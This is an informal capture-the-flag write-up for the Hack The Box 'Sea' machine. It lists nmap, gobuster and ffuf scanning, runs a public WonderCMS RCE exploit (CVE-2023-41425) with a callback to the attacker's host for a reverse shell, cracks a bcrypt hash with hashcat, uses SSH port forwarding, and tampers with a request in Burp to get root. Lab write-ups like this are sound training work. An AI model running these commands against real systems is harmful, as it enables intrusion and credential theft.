Firstly, I have scanned ports with nmap.
two services are running on the target machine and I looked the webservice and scanned the directory with gobuster
All endpoints return either 403 or 301 I can’t find more information about website. Let’s go more deep. I have scanned every endpoint until find a valuable info.
ffuf -c -w /SecLists-2024.4/Discovery/Web-Content/quickhits.txt -u "http//:sea.htb/themes/bike/FUZZ" -t 200 -fx 403
I found about website’s CMS. CMS name is WonderCMS and searched vulnerability whether be or not. Luckly, I found exploit
https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCEpython3 CVE-2023-41425.py -rhost http://sea.htb/loginURL -lhost 10.10.14.17 -lport 9001 -sport 8000there is database.js under the var/www/sea/data
hash is bcrypt hash and I crack the hash with hashcat.
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
I looked the users under home directory
I tried 2 users and amay is working to ssh connection and got user flag
After netstat command, there are open ports that it’s number may be working to find new clue.
netstat -tlnp
I made port forwarding via ssh command
ssh -L 8888:localhost:8080 amay@sea.htbI login with amay credentials
I have analyzed
I click the analyze button.
I looked the access.log directory to understanding which user created file.
File has created by root. I opened burp suite and examined request. I changed request and Finally I got root flag.
